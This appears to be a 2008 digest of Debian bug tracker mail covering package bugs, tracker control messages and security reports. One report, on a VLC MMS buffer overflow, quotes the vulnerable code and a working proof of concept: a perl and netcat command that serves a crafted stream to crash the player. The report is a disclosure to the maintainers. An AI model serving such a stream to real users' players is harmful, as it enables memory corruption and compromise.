Processed: force merge all bugs around the broken build-conflict

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Just found the two other bugs about the issue
 forcemerge 495246 495108 496532
Bug#495246: version syntax error in Build-Conflicts (unexpanded substvar 
${Source-Version})
Bug#495108: xosd source package control info contains unexpanded variable
Bug#496532: Build-Conflict field is wrong
Forcibly Merged 495108 495246 496532.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496748: jppy: Missing dependency on python-vobject

2008-08-27 Thread Alexander Wirt
Package: jppy
Version: 0.0.47-1
Severity: grave
Justification: renders package unusable

Subject says it all:


jppy 
Traceback (most recent call last):
  File /usr/bin/jppy, line 3, in module
import jppy
  File /var/lib/python-support/python2.5/jppy/__init__.py, line 35, in 
module
from vcard import load_vcards
  File /var/lib/python-support/python2.5/jppy/vcard.py, line 3, in module
import vobject

So a recommendation is not enough if I can't even start jppy without 
python-vobject. 

Alex

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-686 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages jppy depends on:
ii  python2.5.2-2An interactive high-level object-o
ii  python-jppy   0.0.47-1   Python API to access J-Pilot conta

Versions of packages jppy recommends:
ii  jpilot1.6.0-1graphical app. to modify the conte
ii  python-vobject0.6.0-1parse iCalendar and VCards in Pyth
pn  txt2pdbdocnone (no description available)

Versions of packages jppy suggests:
ii  jppy-jpilot-plugins   0.0.47-1   J-Pilot plugins to integrate jppy
ii  mutt  1.5.18-4   text-based mailreader supporting M

-- no debconf information



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#495209: marked as done (still fails to build on ia64)

2008-08-27 Thread Debian Bug Tracking System

Your message dated Wed, 27 Aug 2008 06:32:03 +
with message-id [EMAIL PROTECTED]
and subject line Bug#495209: fixed in guile-1.8 1.8.5+1-4
has caused the Debian Bug report #495209,
regarding still fails to build on ia64
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
495209: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=495209
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: guile-1.8
Version: 1.8.5+1-3
Severity: serious

see 
http://buildd.debian.org/fetch.cgi?pkg=guile-1.8ver=1.8.5%2B1-3arch=ia64stamp=1218520791file=log

the control file is missing the ia64 architecture


---End Message---
---BeginMessage---
Source: guile-1.8
Source-Version: 1.8.5+1-4

We believe that the bug you reported is fixed in the latest version of
guile-1.8, which is due to be installed in the Debian FTP archive:

guile-1.8-dev_1.8.5+1-4_i386.deb
  to pool/main/g/guile-1.8/guile-1.8-dev_1.8.5+1-4_i386.deb
guile-1.8-doc_1.8.5+1-4_all.deb
  to pool/main/g/guile-1.8/guile-1.8-doc_1.8.5+1-4_all.deb
guile-1.8-libs_1.8.5+1-4_i386.deb
  to pool/main/g/guile-1.8/guile-1.8-libs_1.8.5+1-4_i386.deb
guile-1.8_1.8.5+1-4.diff.gz
  to pool/main/g/guile-1.8/guile-1.8_1.8.5+1-4.diff.gz
guile-1.8_1.8.5+1-4.dsc
  to pool/main/g/guile-1.8/guile-1.8_1.8.5+1-4.dsc
guile-1.8_1.8.5+1-4_i386.deb
  to pool/main/g/guile-1.8/guile-1.8_1.8.5+1-4_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Rob Browning [EMAIL PROTECTED] (supplier of updated guile-1.8 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Tue, 26 Aug 2008 22:58:14 -0700
Source: guile-1.8
Binary: guile-1.8 guile-1.8-dev guile-1.8-doc guile-1.8-libs
Architecture: source all i386
Version: 1.8.5+1-4
Distribution: unstable
Urgency: medium
Maintainer: Rob Browning [EMAIL PROTECTED]
Changed-By: Rob Browning [EMAIL PROTECTED]
Description: 
 guile-1.8  - The GNU extension language and Scheme interpreter
 guile-1.8-dev - Development files for Guile 1.8
 guile-1.8-doc - Documentation for Guile 1.8
 guile-1.8-libs - Main Guile libraries
Closes: 495209
Changes: 
 guile-1.8 (1.8.5+1-4) unstable; urgency=medium
 .
   * Change Architectures back to any where appropriate (i.e. include
 ia64).  (closes: #495209)
Checksums-Sha1: 
 febdf479023c07dbbfc3a00f6ebec49b8c2a5b8c 1150 guile-1.8_1.8.5+1-4.dsc
 9c68529e06ac425225ab03a8f215cc282b7129c7 208926 guile-1.8_1.8.5+1-4.diff.gz
 47cf9a5876f43b030ee9c78931c0abead67386da 112968 guile-1.8-doc_1.8.5+1-4_all.deb
 132fd18c6a10ea5f817ecd3a6bc82a5e7bc99071 8760 guile-1.8_1.8.5+1-4_i386.deb
 ea13d4c3ea1d70585fc7058576ed3e41cdbfc025 562714 
guile-1.8-dev_1.8.5+1-4_i386.deb
 1dd7740b73a4b4e13504dad4ec06151552915c78 717662 
guile-1.8-libs_1.8.5+1-4_i386.deb
Checksums-Sha256: 
 9cb98b4d9af1236910f25b65123f8d6a80da88bd8bd464d2b9a86f22cf594463 1150 
guile-1.8_1.8.5+1-4.dsc
 4be3077a574b926226f0a4653bb45e8babb04ca9d2e7cc2ae6070fde7a6da5f5 208926 
guile-1.8_1.8.5+1-4.diff.gz
 de5e6916c0fc73ac7f9111893ba1395bfcac83c2979d23a7bbe93787981133e8 112968 
guile-1.8-doc_1.8.5+1-4_all.deb
 89a86f88cec2db1aa27e531d7b9ecf2df8d26b70ac9ef1816df00a147c4bd501 8760 
guile-1.8_1.8.5+1-4_i386.deb
 4c9e42301130c4561aa341fee7538960548e36486f1edf67fe9140afc10e6f30 562714 
guile-1.8-dev_1.8.5+1-4_i386.deb
 2be090c2ab14ae7ff0fbdadf1a0bf441325230701575205ac2872191d676b682 717662 
guile-1.8-libs_1.8.5+1-4_i386.deb
Files: 
 46a937bb112c3913c033b7169813b77a 1150 interpreters optional 
guile-1.8_1.8.5+1-4.dsc
 56b350aaf615cf651fa83ac422f0484f 208926 interpreters optional 
guile-1.8_1.8.5+1-4.diff.gz
 5b33b00f0876550c2032b8cb99ec20dc 112968 doc optional 
guile-1.8-doc_1.8.5+1-4_all.deb
 46ff341f1e7700e2e44283e6738e7525 8760 interpreters optional 
guile-1.8_1.8.5+1-4_i386.deb
 336a643052b44382942c8f052e68fba8 562714 devel optional 
guile-1.8-dev_1.8.5+1-4_i386.deb
 bb875dc9d0cd989553d577a88dc1391e 717662 libs optional 
guile-1.8-libs_1.8.5+1-4_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAki08KgACgkQJcjTd4x+c6Sa5gCeOxmiROqXPIatVjxNmfNmlg0H
CxUAoMAriBiHhdwlUJCDSwJ4bp0+n1t/
=VBF8
-END PGP SIGNATURE-


---End Message---


Bug#496375: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Julien Valroff
Hi Alexander,

Many thanks for your email.
I have been willing to review rkhunter bugs before submitting it.

Le mercredi 27 août 2008 à 04:00 +0400, Solar Designer a écrit :
 FWIW, I happened to independently notice this and report it upstream a
 week ago:
 
 https://sourceforge.net/tracker/?func=detailatid=794190aid=1971965group_id=155034
 
 While I am at it, I suggest that you change /tmp/rkhunter-debug to
 /var/run/rkhunter-debug.  Right now, you have a security hole allowing for
 local root compromise, although indeed the race condition is hard to
 trigger in practice.
 
 To those reading this: please note that this suggestion by no means
 constitutes a security review of rkhunter by me.
 
 I notice that the Debian package was fixed to use mktemp; I think that a
 fixed filename under /var/run would be better in this case.  Also,
 rkhunter could be patched to enforce mode 600 on the file, regardless of
 umask.  (mktemp does that, but when a fixed filename under /var/run is
 used instead, that would need to be explicit.)  Oh, and I was probably
 wrong about the race condition being hard to trigger - I forgot about
 directory notifications for a moment.

I am far from being a security expert.
Do you suggest that using /var/run/rkhunter-debug is better
than /tmp/rkhunter-debug. (created using mktemp)?
or is that still using mktemp to create a /var/run/rkhunter-debug.XX
file?

Can you explain why it is more secure? I am ready to patch rkhunter
debian package, but need to be sure I understand well what I do!

Thanks again for your help.

Cheers,
Julien




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496403: mgetty insecure temp file usage

2008-08-27 Thread Tomas Hoger
Hi Thijs!

 # get unique directory name, using faxq-helper

This does not seem to be much of an issue beyond DoS, right?  mkdir
returns an error when $spooldir already exists.  Yeah, 'mktemp -t -d'
looks like a better alternative though...

 # if filename is -, use stdin

I noticed that following patch is used in all Fedora / Red Hat mgetty
packages for quite some time now:

http://cvs.fedoraproject.org/viewvc/rpms/mgetty/devel/mgetty-1.1.30-mktemp.patch?view=markup

(it can possibly benefit from few more Xes in file name template too ;)

HTH

-- 
Tomas Hoger



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: tagging 490910

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.9.26
 tags 490910 + pending
Bug#490910: linux-2.6: CVE-2008-0598 information disclosure
Tags were: patch security
Tags added: pending


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: merge

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 merge 496558 496678
Bug#496558: nautilus: Fails to browse
Bug#496678: nautilus: Fails to start
Merged 496558 496678.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: ...

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 496558 +confirmed
Bug#496558: nautilus: Fails to browse
There were no tags set.
Bug#496678: nautilus: Fails to start
Tags added: confirmed

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496375: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Solar Designer
On Wed, Aug 27, 2008 at 09:06:58AM +0200, Julien Valroff wrote:
 Do you suggest that using /var/run/rkhunter-debug is better
 than /tmp/rkhunter-debug. (created using mktemp)?

Yes - primarily from usability standpoint.  This time, having a fixed
filename is better, and since rkhunter needs to be run as root anyway
(does it?), /var/run should do and be safe.  However, if I am wrong in
my assumption that rkhunter requires root, then indeed /var/run is not
appropriate - and the mktemp approach makes sense.

 or is that still using mktemp to create a /var/run/rkhunter-debug.XX
 file?

No.

 Can you explain why it is more secure?

That was not the point I was making.  Rather, the point was/is that
mktemp is normally used for program-internal and truly temporary files,
and this time we have a file that is meant to be accessed by a human
user - so a fixed filename in a directory only writable by root may be
more appropriate.  However, once again, if rkhunter may reasonably be
run by non-root (I just don't know, I've never used rkhunter), then
mktemp -t ... may be appropriate as it will retain that capability.

Alexander



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496558: nautilus: Fails to browser - confirmed

2008-08-27 Thread Dieter Faulbaum

I found this error too (but on a etch version).

And it seems to me that the last (security) upgrade of libxml2 and/or
libmxl2-utils caused this error.




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496558: nautilus: Fails to browser - confirmed

2008-08-27 Thread Stephan Peijnik

On Wed, 27 Aug 2008 10:33:13 +0200, Dieter Faulbaum
[EMAIL PROTECTED] wrote:
 
 I found this error too (but on a etch version).
 
 And it seems to me that the last (security) upgrade of libxml2 and/or
 libmxl2-utils caused this error.

Could you please provide the exact version number of your installed
nautilus?

Have you tried downgrading libxml2 again?




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#493667: nfs-common: nfs quite broken

2008-08-27 Thread Vincent Danjean
  Hi,

  I experiment the same problem in my lab which has an etch nfs server.
When stations are upgraded to nfs-common 1:1.1.3-1, users cannot access
their files. Adding sec=sys to the client's mount options fix the problem.
  As I found the fix in Debian bug report, I did not make yet another
bug report. However, as you ask for the success of the proposed workaround, I
can confirm it for my case.

  But I would like to know if you recommend adding this option on all
clients or if you will think it will be solved (in the kernel or in
nfs-common) before this bugs reaches testing (was it for lenny or lenny+1)

  Best regards,
Vincent

-- 
Vincent Danjean   GPG key ID 0x9D025E87 [EMAIL PROTECTED]
GPG key fingerprint: FC95 08A6 854D DB48 4B9A  8A94 0BF7 7867 9D02 5E87
Unofficial pacakges: http://www-id.imag.fr/~danjean/deb.html#package
APT repo:  deb http://perso.debian.org/~vdanjean/debian unstable main




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496758: Too late for lenny

2008-08-27 Thread Goswin von Brederlow
Package: ia32-libs-tools
Version: 12
Severity: critical

This is just a reminder notice to stop any migrating to lenny.

It took way too long to get ia32-libs-tools through NEW and there just
isn't enough time left to get this tested and fixed properly.

Do not include ia32-libs-tools in lenny.

MfG
Goswin

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (400, 'unstable-i386')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.25-kvm-nofb (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages ia32-libs-tools depends on:
ii  aptitude  0.4.11.8-1 terminal-based package manager
ii  build-essential   11.3   informational list of build-essent
ii  dctrl-tools [grep-dctrl]  2.13.0 Command-line tools to process Debi
ii  devscripts2.10.33scripts to make the life of a Debi
ii  libc6 2.7-12 GNU C Library: Shared libraries
ii  libgcc1   1:4.3.1-5  GCC support library
ii  libstdc++64.3.1-5The GNU Standard C++ Library v3
ii  lsb-release   3.2-13 Linux Standard Base version report

ia32-libs-tools recommends no packages.

-- no debconf information



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496625: Problem with multicast communication (plus solution)

2008-08-27 Thread Piotr Meyer
On Tue, Aug 26, 2008 at 11:52:18AM -0500, Eric Evans wrote:
 
 Yes, you are correct. A fix for this was incorporated into the final 
 release (1.5), which I uploaded to unstable last night. If you are in
 a position to test it, any feedback would be appreciated.

I test ucarp 1.5-1 from unstable and all problems gone away. Mny
thanks!

-- 
Piotr 'aniou' Meyer



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#495354: [DebianGIS-dev] Bug#495354: gdalinfo segfaults on a 6.2Mib netCDF file

2008-08-27 Thread Francesco P. Lovergine
severity 495354 normal
thanks

This is not grave, the package is perfectly usable with many
other formats. I will investigate with upstream about that.
Also consider that netcdf support is partially broken because
hdf4 is historically built in a not completely gdal-compliant
way. That's is solved in experimental.

On Sat, Aug 16, 2008 at 11:29:29AM -0300, Paulo Marcondes wrote:
 Subject: gdal-bin: gdalinfo segfaults on a 6.2MiB netCDF file
 Package: gdal-bin
 Version: 1.5.2-3
 Severity: grave
 Justification: renders package unusable
 
 *** Please type your report below this line ***
 
 I got a  segmentation fault when running gdalinfo 3n24s47w14w.grd
 file was downloaded from
 http://www.bodc.ac.uk/data/online_delivery/gebco/select/
 
 $ ls -lh *.grd
 -rw-r--r-- 1 marcondes marcondes 6,2M Ago 16 00:46 3n24s47w14w.grd
 
 file is attached as bzip2 file.
 

-- 
Francesco P. Lovergine



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Re: [DebianGIS-dev] Bug#495354: gdalinfo segfaults on a 6.2Mib netCDF file

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 severity 495354 normal
Bug#495354: gdalinfo segfaults on a 6.2Mib netCDF file
Bug#495353: gdal-bin: gdalinfo segfaults on a 6.2Mib netCDF file
Severity set to `normal' from `grave'

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Re: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 severity 496382 normal
Bug#496382: The possibility of attack with the help of symlinks in some Debian 
packages
Severity set to `normal' from `grave'

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496122: new upstream version of libfile-sharedir-perl

2008-08-27 Thread Ansgar Burchardt
Hi,

libfile-sharedir-perl has a currently a grave bug because the directory
layout used to store data has changed.  This means the package is
unusable for Perl distributions whose name contains a - and
a recent Module::Install (= 0.76, released on 17 Jul 2008 and included in
Lenny), see #496122.

This was fixed in version 0.99_01 (also released as 1.00 without
changes), which was released coordinated with Module::Install on
Jul 17th.

Besides updating tests and the build system (new version of
Module:Install) there are only two non-bugfix changes in the new
upstream release:
 * A new function `class_file' that will look for data
   files in the namespaces of parent classes (36 lines long), and
 * the other `*_file' functions will allow searching for any kind of
   path, not only regular files (changes some tests for (regular) files to
   tests if path exists)

As these other changes are not very large, I would like to know if the release
team would accept the new upstream release for Lenny instead of backporting the
fixes and updates to tests.

Regards,
Ansgar

Links to upstream tarballs:
  0.05 - 
http://search.cpan.org/CPAN/authors/id/A/AD/ADAMK/File-ShareDir-0.05.tar.gz
  1.00 - 
http://search.cpan.org/CPAN/authors/id/A/AD/ADAMK/File-ShareDir-1.00.tar.gz

Full changelog for upstream changes:

1.00 Thu 17 Jul 2008
- Everything appears ok, release prod

0.99_01 Thu 10 Jul 2009
- Updating tests a little
- Adding the class_file function
- Allow *_file to find any kind of path, not just files (hdp)
- Localising $@ during evals
- Implementing the new sharedir model

Diffstat between 0.05 and 1.00:

 Changes|   10
 MANIFEST   |7
 META.yml   |   27 +
 Makefile.PL|   22 -
 README |   41 ++
 foo/test_file.txt  |1
 inc/Module/Install.pm  |  437 ---
 inc/Module/Install/Base.pm |6
 inc/Module/Install/Can.pm  |2
 inc/Module/Install/Fetch.pm|2
 inc/Module/Install/Makefile.pm |  333 +++--
 inc/Module/Install/Metadata.pm |  650 
+
 inc/Module/Install/Share.pm|   45 ++
 inc/Module/Install/Win32.pm|   13
 inc/Module/Install/WriteAll.pm |   55 +--
 lib/File/ShareDir.pm   |  253 ++-
 share/subdir/sample.txt|7
 t/01_compile.t |   13
 t/02_main.t|   52 +--
 t/97_meta.t|   27 +
 t/98_pod.t |   32 ++
 t/99_pmv.t |   27 +
 t/99_pod.t |   36 --
 t/lib/ShareDir.pm  |   11
 24 files changed, 1385 insertions(+), 724 deletions(-)

 
Changes to lib/File/ShareDir.pm (minus documentation only hunks):
The internal function _dist_packfile is not used anywhere.

--- File-ShareDir-0.05/lib/File/ShareDir.pm 2006-09-04 02:52:56.0 
+0200
+++ File-ShareDir-1.00/lib/File/ShareDir.pm 2008-07-17 09:58:40.0 
+0200
@@ -104,22 +107,29 @@
 
 use 5.005;
 use strict;
-use base 'Exporter';
 use Carp 'croak';
+use Config   ();
+use Exporter ();
 use File::Spec   ();
 use Params::Util '_CLASS';
 use Class::Inspector ();
 
-use vars qw{$VERSION $IS_MACOS @EXPORT_OK %EXPORT_TAGS};
+use vars qw{$VERSION @ISA @EXPORT_OK %EXPORT_TAGS};
 BEGIN {
-   $VERSION = '0.05';
-   $IS_MACOS= $^O eq 'MacOS';
-   @EXPORT_OK   = qw{dist_dir dist_file module_dir module_file};
+   $VERSION = '1.00';
+   @ISA = qw{ Exporter };
+   @EXPORT_OK   = qw{
+   dist_dir dist_file
+   module_dir module_file
+   class_dir class_file
+   };
%EXPORT_TAGS = (
ALL = [ @EXPORT_OK ],
-   );  
+   );  
 }
 
+use constant IS_MACOS = !!($^O eq 'MacOS');
+
 
 
 
 The Cdist_dir function takes a single parameter of the name of an
@@ -145,11 +155,49 @@
 
 sub dist_dir {
my $dist = _DIST(shift);
+   my $dir;
+
+   # Try the new version
+   $dir = _dist_dir_new( $dist );
+   return $dir if defined $dir;
+
+   # Fall back to the legacy version
+   $dir = _dist_dir_old( $dist );
+   return $dir if defined $dir;
+
+   # Ran out of options
+   croak(Failed to find share dir for dist '$dist');
+}
+
+sub _dist_dir_new {
+   my $dist = shift;
+
+   # Create the subpath
+   my $path = File::Spec-catdir(
+   'auto', 'share', 'dist', $dist,
+   );
+
+   # Find the full dir withing @INC
+   foreach my $inc ( @INC ) {
+   next unless defined $inc and ! ref $inc;
+   my $dir = File::Spec-catdir( $inc, $path );
+   next unless -d 

Bug#496265: marked as done (vlc: buffer overflow in mms handling)

2008-08-27 Thread Debian Bug Tracking System

Your message dated Wed, 27 Aug 2008 09:47:13 +
with message-id [EMAIL PROTECTED]
and subject line Bug#496265: fixed in vlc 0.8.6.i-2
has caused the Debian Bug report #496265,
regarding vlc: buffer overflow in mms handling
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
496265: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496265
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: vlc
Version: 0.8.6.i-1
Severity: grave
Tags: security

Hi,
the following security issue was published for vlc

static int mms_ReceiveCommand( access_t *p_access )
{
access_sys_t *p_sys = p_access-p_sys;

for( ;; )
{
int i_used;
int i_status;

if( NetFillBuffer( p_access )  0 )
{
msg_Warn( p_access, cannot fill buffer );
return VLC_EGENERIC;
}
if( p_sys-i_buffer_tcp  0 )
{
[1] i_status = mms_ParseCommand( p_access, p_sys-buffer_tcp,
 p_sys-i_buffer_tcp, i_used );
[2] if( i_used  MMS_BUFFER_SIZE )  
{
[3] memmove( p_sys-buffer_tcp, p_sys-buffer_tcp + i_used,
 MMS_BUFFER_SIZE - i_used );//BUG! i_used overflow

(...)

[1] - function that sets i_used to negative value, see below
[2] - i_used is signed, so predicate is true
[3] - actual overflow, we have good control over what is written

static int  mms_ParseCommand( access_t *p_access,
  uint8_t *p_data,
  int i_data,
  int *pi_used )
(...)
i_length = GetDWLE( p_data + 8 ) + 16;
(...)
if( i_length  p_sys-i_cmd )
{
msg_Warn( p_access,
  truncated command (missing %d bytes),
   i_length - i_data  );
p_sys-i_command = 0;
return -1;
}
[1] else if( i_length  p_sys-i_cmd )
{
p_sys-i_cmd = i_length;
[2] *pi_used = i_length;
}

(...)

[1] - predicate is true
[2] - sets i_used from mms_ReceiveCommand

- - Proof of concept -

on localhost:

perl -e 'print \xce\xfa\x0b\xb0\xef\xff\xef\xff; print ax100'  headshot
nc -l -v -p 1755  headshot 

open this url in VLC:

mmst://127.0.0.1/


I can confirm this issue exists.
Please see http://www.orange-bat.com/adv/2008/adv.08.24.txt for the original 
advisory.

I'll follow up on this bug report with a CVE id soon.

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgpJvvvyeo4kv.pgp
Description: PGP signature
---End Message---
---BeginMessage---
Source: vlc
Source-Version: 0.8.6.i-2

We believe that the bug you reported is fixed in the latest version of
vlc, which is due to be installed in the Debian FTP archive:

libvlc0-dev_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/libvlc0-dev_0.8.6.i-2_amd64.deb
libvlc0_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/libvlc0_0.8.6.i-2_amd64.deb
mozilla-plugin-vlc_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/mozilla-plugin-vlc_0.8.6.i-2_amd64.deb
vlc-nox_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-nox_0.8.6.i-2_amd64.deb
vlc-plugin-arts_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-arts_0.8.6.i-2_amd64.deb
vlc-plugin-esd_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-esd_0.8.6.i-2_amd64.deb
vlc-plugin-ggi_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-ggi_0.8.6.i-2_amd64.deb
vlc-plugin-jack_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-jack_0.8.6.i-2_amd64.deb
vlc-plugin-sdl_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-sdl_0.8.6.i-2_amd64.deb
vlc-plugin-svgalib_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-svgalib_0.8.6.i-2_amd64.deb
vlc_0.8.6.i-2.diff.gz
  to pool/main/v/vlc/vlc_0.8.6.i-2.diff.gz
vlc_0.8.6.i-2.dsc
  to pool/main/v/vlc/vlc_0.8.6.i-2.dsc
vlc_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc_0.8.6.i-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Sam Hocevar (Debian packages) [EMAIL PROTECTED] (supplier of updated vlc 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Tue, 26 Aug 2008 

Bug#495712: wine: does not start

2008-08-27 Thread Moritz Muehlenhoff
On Tue, Aug 19, 2008 at 11:21:52PM +0200, M. KLEIN wrote:
 Package: wine
 Version: 1.0.0-1
 Severity: grave
 Justification: renders package unusable
 
 [EN] Any wine* commande (wine, winecfg ...) produces the following
 message, but nothing else append:
 
 /usr/bin/wine: line 63: /usr/lib/wine/wine.bin: Aucun fichier ou
 répertoire de ce type
 /usr/bin/wine: line 63: /usr/lib/wine/wine.bin: Succès
 
 I've tried to purge wine package, without succes.

This isn't a general bug, since I've tried to succesfully run apps with 
both amd64 and i386.

How exactly did you start wine?
Aucun fichier ou répertoire de ce type means No such file or directory
I suppose? Can you please post the output of ls /usr/lib/wine/wine.bin?

Cheers,
Moritz



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496382: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Moritz Muehlenhoff
severity 496382 normal
thanks

On Sun, Aug 24, 2008 at 10:05:30PM +0400, Dmitry E. Oboukhov wrote:
 Package: bulmages-servers
 Severity: grave
 
 Binary-package: bulmages-servers (0.11.1-2)
 file: /usr/share/bulmages/examples/scripts/actualizabulmacont
 file: /usr/share/bulmages/examples/scripts/installbulmages-db
 file: /usr/share/bulmages/examples/scripts/creabulmafact
 file: /usr/share/bulmages/examples/scripts/creabulmacont
 file: /usr/share/bulmages/examples/scripts/actualizabulmafact

I'm lowering the severity since the affected scripts are only
example scripts.

Cheers,
Moritz



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Remove forwarded tag

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # The upstream bug is for xmonad, and this issue is unrelated.
 notforwarded 496677
Bug#496677: Cairo backend unusable on 64-bit architectures
Removed annotation that Bug had been forwarded to 
https://savannah.gnu.org/bugs/index.php?24083.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: update found field...

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # as reported by Dieter Faulbaum...
 found 496558 2.4.13-11+b1
Bug#496558: nautilus: Fails to browse
